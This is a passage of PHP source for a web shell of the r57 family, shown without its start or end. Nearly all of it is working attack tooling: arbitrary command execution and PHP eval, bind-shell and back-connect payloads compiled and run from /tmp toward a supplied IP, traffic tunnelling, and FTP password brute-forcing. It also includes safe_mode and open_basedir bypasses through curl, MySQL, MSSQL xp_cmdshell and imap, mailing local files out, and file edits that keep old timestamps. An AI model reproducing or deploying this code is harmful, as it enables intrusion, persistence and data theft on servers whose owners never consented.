+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } + if($safe_mode) { $sysctl = '-'; } + else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } + else + { + $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); + if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } + if(empty($sysctl)) { $sysctl = '-'; } + setcookie('sysctl',$sysctl); + } + } +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"sdfsdfsdf/sdfsdfsdf/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("sdfsdfsdqf/sdfsdfsdfds/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8" TEXT="#ff6600" ><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000 width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'ascrimez '.$version.'</b></font></td><td bgcolor=#660000><font face=Verdana size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +if($unix) + { + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; + } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2)."safe_mode: <b>"; +echo (($safe_mode)?("<font color=green>ON_secure</font>"):("<font color=red>OFF_not_secure</font>")); +echo "</b>".ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} +echo "</b><br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if($unix){ +echo '<font color=yellow><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from ghhghh'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } + + +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); + @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + case 'test8': + if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118']; + else echo $lang[$language.'_text119']; + break; +case 'test9': +$evilc0der=$_POST['Albania']; +if($_POST['Albania']) +{ +ini_restore("safe_mode"); +ini_restore("open_basedir"); +$safemodgec = shell_exec($evilc0der); +echo $safemodgec; +break; +} + + + + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ + +ini_restore("safe_mode"); +ini_restore("open_basedir"); + + +if(!strpos(ex("echo abcr57"),"r57")!=3) +{ +$bypasser="bypass_on"; +echo $fs.$table_up1.$lang[$language.'_text120'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text121'].$arrow."</b>",in('text','Albania',85,(!empty($_POST['Albania'])?($_POST['Albania']):("uname -a"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_text122'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm 